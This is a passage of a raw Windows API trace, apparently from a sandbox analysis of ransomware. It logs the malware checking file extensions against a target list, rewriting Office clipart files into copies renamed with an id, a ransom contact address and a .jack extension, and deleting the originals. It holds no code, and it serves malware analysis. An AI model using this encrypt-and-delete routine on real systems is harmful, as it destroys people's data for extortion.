[0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString=".jpg") returned 4 [0209.607] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString=".doc") returned 4 [0209.607] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.607] lstrlenW (lpString=".docx") returned 5 [0209.607] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.608] lstrlenW (lpString=".pdf") returned 4 [0209.608] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.608] lstrlenW (lpString=".xls") returned 4 [0209.608] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.608] lstrlenW (lpString=".xlsx") returned 5 [0209.608] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.608] lstrlenW (lpString=".ppt") returned 4 [0209.608] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.608] lstrlenW (lpString=".zip") returned 4 [0209.608] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.608] lstrlenW (lpString=".rar") returned 4 [0209.608] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.608] lstrlenW (lpString=".bz2") returned 4 [0209.608] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.608] lstrlenW (lpString=".7z") returned 3 [0209.608] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.608] lstrlenW (lpString=".dbf") returned 4 [0209.608] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.608] lstrlenW (lpString=".1cd") returned 4 [0209.608] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.608] lstrlenW (lpString=".jpg") returned 4 [0209.608] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.608] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.608] lstrlenW (lpString="AG00135_.GIF") returned 12 [0209.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0209.610] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=2596) returned 1 [0209.610] CloseHandle (hObject=0x3f4) returned 1 [0209.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 0x220 [0209.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0209.610] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.610] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0209.610] GetLastError () returned 0x0 [0209.610] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xa24, lpOverlapped=0x0) returned 1 [0209.892] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xa30, lpOverlapped=0x0) returned 1 [0209.894] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.894] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.894] SetEndOfFile (hFile=0x418) returned 1 [0209.894] CloseHandle (hObject=0x418) returned 1 [0209.899] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.900] SetEndOfFile (hFile=0x3f4) returned 1 [0209.901] CloseHandle (hObject=0x3f4) returned 1 [0209.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.901] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0209.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.901] lstrlenW (lpString=".doc") returned 4 [0209.901] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.902] lstrlenW (lpString=".docx") returned 5 [0209.902] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.902] lstrlenW (lpString=".pdf") returned 4 [0209.902] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.902] lstrlenW (lpString=".xls") returned 4 [0209.902] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.902] lstrlenW (lpString=".xlsx") returned 5 [0209.902] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.902] lstrlenW (lpString=".ppt") returned 4 [0209.902] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.902] lstrlenW (lpString=".zip") returned 4 [0209.902] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.902] lstrlenW (lpString=".rar") returned 4 [0209.902] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.902] lstrlenW (lpString=".bz2") returned 4 [0209.902] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.902] lstrlenW (lpString=".7z") returned 3 [0209.902] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.902] lstrlenW (lpString=".dbf") returned 4 [0209.903] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString=".1cd") returned 4 [0209.903] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString=".jpg") returned 4 [0209.903] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString=".doc") returned 4 [0209.903] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.903] lstrlenW (lpString=".docx") returned 5 [0209.903] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.903] lstrlenW (lpString=".pdf") returned 4 [0209.903] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString=".xls") returned 4 [0209.903] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString=".xlsx") returned 5 [0209.903] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.903] lstrlenW (lpString=".ppt") returned 4 [0209.903] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString=".zip") returned 4 [0209.903] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString=".rar") returned 4 [0209.903] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.903] lstrlenW (lpString=".bz2") returned 4 [0209.903] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.903] lstrlenW (lpString=".7z") returned 3 [0209.903] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.903] lstrlenW (lpString=".dbf") returned 4 [0209.904] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.904] lstrlenW (lpString=".1cd") returned 4 [0209.904] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0209.904] lstrlenW (lpString=".jpg") returned 4 [0209.904] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.904] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.904] lstrlenW (lpString="AG00154_.GIF") returned 12 [0209.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0210.262] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=5315) returned 1 [0210.262] CloseHandle (hObject=0x3d4) returned 1 [0210.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 0x220 [0210.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0210.262] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.262] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0210.597] GetLastError () returned 0x0 [0210.597] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x14c3, lpOverlapped=0x0) returned 1 [0210.817] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x14d0, lpOverlapped=0x0) returned 1 [0210.818] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.818] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0210.818] SetEndOfFile (hFile=0x43c) returned 1 [0210.818] CloseHandle (hObject=0x43c) returned 1 [0210.819] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.819] SetEndOfFile (hFile=0x3d4) returned 1 [0210.820] CloseHandle (hObject=0x3d4) returned 1 [0210.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0210.820] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString=".doc") returned 4 [0210.821] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0210.821] lstrlenW (lpString=".docx") returned 5 [0210.821] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0210.821] lstrlenW (lpString=".pdf") returned 4 [0210.821] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString=".xls") returned 4 [0210.821] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString=".xlsx") returned 5 [0210.821] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0210.821] lstrlenW (lpString=".ppt") returned 4 [0210.821] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString=".zip") returned 4 [0210.821] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString=".rar") returned 4 [0210.821] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString=".bz2") returned 4 [0210.821] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0210.821] lstrlenW (lpString=".7z") returned 3 [0210.821] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString=".dbf") returned 4 [0210.821] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString=".1cd") returned 4 [0210.821] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.821] lstrlenW (lpString=".jpg") returned 4 [0210.821] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0210.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.822] lstrlenW (lpString=".doc") returned 4 [0210.822] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0210.822] lstrlenW (lpString=".docx") returned 5 [0210.822] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0210.822] lstrlenW (lpString=".pdf") returned 4 [0210.822] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0210.822] lstrlenW (lpString=".xls") returned 4 [0210.822] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0210.822] lstrlenW (lpString=".xlsx") returned 5 [0210.822] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0210.822] lstrlenW (lpString=".ppt") returned 4 [0210.822] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0210.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.822] lstrlenW (lpString=".zip") returned 4 [0210.822] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.822] lstrlenW (lpString=".rar") returned 4 [0210.822] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.822] lstrlenW (lpString=".bz2") returned 4 [0210.822] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0210.822] lstrlenW (lpString=".7z") returned 3 [0210.822] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0210.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.822] lstrlenW (lpString=".dbf") returned 4 [0210.822] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.823] lstrlenW (lpString=".1cd") returned 4 [0210.823] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0210.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0210.823] lstrlenW (lpString=".jpg") returned 4 [0210.823] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0210.823] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0210.823] lstrlenW (lpString="AG00161_.GIF") returned 12 [0210.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0210.824] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=7583) returned 1 [0210.824] CloseHandle (hObject=0x3d4) returned 1 [0210.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 0x220 [0210.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0210.824] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.824] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0210.825] GetLastError () returned 0x0 [0210.825] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1d9f, lpOverlapped=0x0) returned 1 [0211.111] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x1da0, lpOverlapped=0x0) returned 1 [0211.112] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0211.112] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0211.112] SetEndOfFile (hFile=0x43c) returned 1 [0211.112] CloseHandle (hObject=0x43c) returned 1 [0211.113] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.113] SetEndOfFile (hFile=0x3d4) returned 1 [0211.114] CloseHandle (hObject=0x3d4) returned 1 [0211.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0211.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString=".doc") returned 4 [0211.115] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.115] lstrlenW (lpString=".docx") returned 5 [0211.115] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.115] lstrlenW (lpString=".pdf") returned 4 [0211.115] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.115] lstrlenW (lpString=".xls") returned 4 [0211.115] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.115] lstrlenW (lpString=".xlsx") returned 5 [0211.115] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.115] lstrlenW (lpString=".ppt") returned 4 [0211.115] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString=".zip") returned 4 [0211.115] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.115] lstrlenW (lpString=".rar") returned 4 [0211.115] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.115] lstrlenW (lpString=".bz2") returned 4 [0211.115] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.115] lstrlenW (lpString=".7z") returned 3 [0211.115] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString=".dbf") returned 4 [0211.115] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString=".1cd") returned 4 [0211.115] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.115] lstrlenW (lpString=".jpg") returned 4 [0211.115] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW 